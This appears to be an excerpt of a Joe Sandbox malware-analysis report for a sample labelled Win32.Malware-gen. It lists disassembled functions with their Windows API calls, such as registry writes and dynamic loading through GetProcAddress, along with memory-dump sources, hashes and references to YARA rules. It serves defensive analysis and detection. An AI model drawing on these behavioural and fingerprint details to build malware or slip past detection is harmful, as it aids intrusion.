                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1849352358-0
                                                                                                                        • Opcode ID: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                                                                                        • Instruction ID: 002387d4b88dbb62f40c54eb0dee3f9a721ef30fc2dbb8ae50818b7fec09efb0
                                                                                                                        • Opcode Fuzzy Hash: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                                                                                        • Instruction Fuzzy Hash: 0F21F872A00119AFCB15DF98DE45AEEBBB5EB08304F14003AF945F62A0D7789D41DB98
                                                                                                                        Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(?), ref: 00401E56
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                                                        • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3808545654-0
                                                                                                                        • Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                                                                                        • Instruction ID: 1c21784e8a12ec6bf8935da156a17e2c336e66cb5fe6e154f3a2125ab74843e9
                                                                                                                        • Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                                                                                        • Instruction Fuzzy Hash: 5A018871954240EFE7015BB4AE9ABDD3FB5AF15301F10497AF141B61E2C6B90445DB3C
                                                                                                                        Function 705916BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,705922D8,?,00000808), ref: 705916D5
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,705922D8,?,00000808), ref: 705916DC
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,705922D8,?,00000808), ref: 705916F0
                                                                                                                        • GetProcAddress.KERNEL32(705922D8,00000000), ref: 705916F7
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70591700
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72590238197.0000000070590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590417653.0000000070594000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590494752.0000000070596000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1148316912-0
                                                                                                                        • Opcode ID: 2253d5e9ec3fd221f3ac018f41080be408a9efe25a1c647fcddd077bd50b80d3
                                                                                                                        • Instruction ID: 0bea6d94eab1a8d6646ae73ceea23cf07f441035e1006326293e231171080b00
                                                                                                                        • Opcode Fuzzy Hash: 2253d5e9ec3fd221f3ac018f41080be408a9efe25a1c647fcddd077bd50b80d3
                                                                                                                        • Instruction Fuzzy Hash: 06F012731161387BD62017A79C4CDAB7E9CDF9B2F5B120216F718A11A096614C01DBF1
                                                                                                                        Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                        • String ID: !
                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                        • Opcode ID: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                                                                                        • Instruction ID: dc9a0f57bab323a5eda2152a626e9899419b02716f24503a8b80c8a4184e75e9
                                                                                                                        • Opcode Fuzzy Hash: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                                                                                        • Instruction Fuzzy Hash: E921AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                                                                                                                        Function 00404D4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                                                        • wsprintfW.USER32 ref: 00404DF7
                                                                                                                        • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                        • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                                                        • Instruction ID: 33e626053c854acaf0ea976fdeb40ece7b69d158cb37adfcb571004cb6629101
                                                                                                                        • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                                                        • Instruction Fuzzy Hash: 2C11EB7360412877DB00666DAC46EAE329DDF85334F250237FA66F31D5EA79C92242E8
                                                                                                                        Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000023,00000011,00000002), ref: 004024DA
                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,00000011,00000002), ref: 0040251A
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseValuelstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nst8185.tmp
                                                                                                                        • API String ID: 2655323295-240906782
                                                                                                                        • Opcode ID: 8b31c99460fdf6c2949f4debf72b45d412ee72b0ef63aad6f5470ffe0bc1fffc
                                                                                                                        • Instruction ID: 9515a87f615354861ff9cc8d48f56862c3e7cd04d157db2ad705c0a1b7eb65e0
                                                                                                                        • Opcode Fuzzy Hash: 8b31c99460fdf6c2949f4debf72b45d412ee72b0ef63aad6f5470ffe0bc1fffc
                                                                                                                        • Instruction Fuzzy Hash: 45116D71900118BEEB11EFA5DE59AAEBAB4AF54318F10443FF504B61C1C7B98E419A58
                                                                                                                        Function 00405E9B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nst8185.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405EA9
                                                                                                                        • CharNextW.USER32(00000000), ref: 00405EAE
                                                                                                                        • CharNextW.USER32(00000000), ref: 00405EC6
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\nst8185.tmp, xrefs: 00405E9C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nst8185.tmp
                                                                                                                        • API String ID: 3213498283-240906782
                                                                                                                        • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                                                        • Instruction ID: c4cc3313bff2df52cb6c0caf4e8c88866a305d48728ab5da0ab5d468dade8cef
                                                                                                                        • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                                                        • Instruction Fuzzy Hash: E4F0F631910F2595DA317764CC44E7766B8EB54351B00803BD282B36C1DBF88A819FEA
                                                                                                                        Function 00405DF0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405DF6
                                                                                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405E00
                                                                                                                        • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E12
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 2659869361-3355392842
                                                                                                                        • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                        • Instruction ID: dcf52917e326d6ada13c2a72ecce68a7b96b6e8782615359caad44c872c99b85
                                                                                                                        • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                        • Instruction Fuzzy Hash: EBD05EB1101634AAC2116B48AC04CDF62AC9E86704381402AF141B20A6C7785D6296ED
                                                                                                                        Function 705910E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 70591171
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 705911E3
                                                                                                                        • GlobalFree.KERNEL32 ref: 7059124A
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 7059129B
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 705912B1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72590238197.0000000070590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590417653.0000000070594000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590494752.0000000070596000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Free$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1780285237-0
                                                                                                                        • Opcode ID: 2f7cf97b9cae08b6324fe217992e032e544c4e396fee45486b6e2b21b5196e5f
                                                                                                                        • Instruction ID: 32849708af39c4504e183628d61b2b5223da7f6ecf0787169565abc59d5c90e1
                                                                                                                        • Opcode Fuzzy Hash: 2f7cf97b9cae08b6324fe217992e032e544c4e396fee45486b6e2b21b5196e5f
                                                                                                                        • Instruction Fuzzy Hash: 9951807A9202119FDB01DF66CD4DA297BB8FB54314B25451AF906EB360E734AD20CB5C
                                                                                                                        Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll), ref: 0040269A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nst8185.tmp$C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll
                                                                                                                        • API String ID: 1659193697-3437876282
                                                                                                                        • Opcode ID: 34c7efb81093797c11027e5546ec3e843140785abad449b49019a9492c78efcd
                                                                                                                        • Instruction ID: 24c820640bf83c35ca015f911653a3ecbd9f7363fc1a8715c972f2d02b23d4ac
                                                                                                                        • Opcode Fuzzy Hash: 34c7efb81093797c11027e5546ec3e843140785abad449b49019a9492c78efcd
                                                                                                                        • Instruction Fuzzy Hash: 11113A72A40311BBCB00BBB19E46EAE36709F50748F60443FF402F61C0D6FD4991565E
                                                                                                                        Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(00000000,00000000,004031FC,?), ref: 00403031
                                                                                                                        • GetTickCount.KERNEL32 ref: 0040304F
                                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2102729457-0
                                                                                                                        • Opcode ID: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                                                                                        • Instruction ID: fc94ebd698381dfc42c8ec832a7b78cf8da54aaf5e1058e2af7a384a9ccf94d3
                                                                                                                        • Opcode Fuzzy Hash: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                                                                                        • Instruction Fuzzy Hash: 0FF05471602621ABC6306F50BD08A9B7E69FB44B53F41087AF045B11A9CB7548828B9C
                                                                                                                        Function 0040551A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00405549
                                                                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 0040559A
                                                                                                                          • Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                        • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                                                        • Instruction ID: 85372f17a9103eb01fcdfd8a19690b8d052d76dd043ca16804f8a0d8951f02ed
                                                                                                                        • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                                                        • Instruction Fuzzy Hash: 53017171200609BFDF309F51DD80AAB362AFB84750F540437FA047A1D5C7B98D52AE69
                                                                                                                        Function 00403B5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,76343420,00000000,C:\Users\user\AppData\Local\Temp\,00403B36,00403A4C,?,?,00000008,0000000A,0000000C), ref: 00403B78
                                                                                                                        • GlobalFree.KERNEL32(004EFEC0), ref: 00403B7F
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
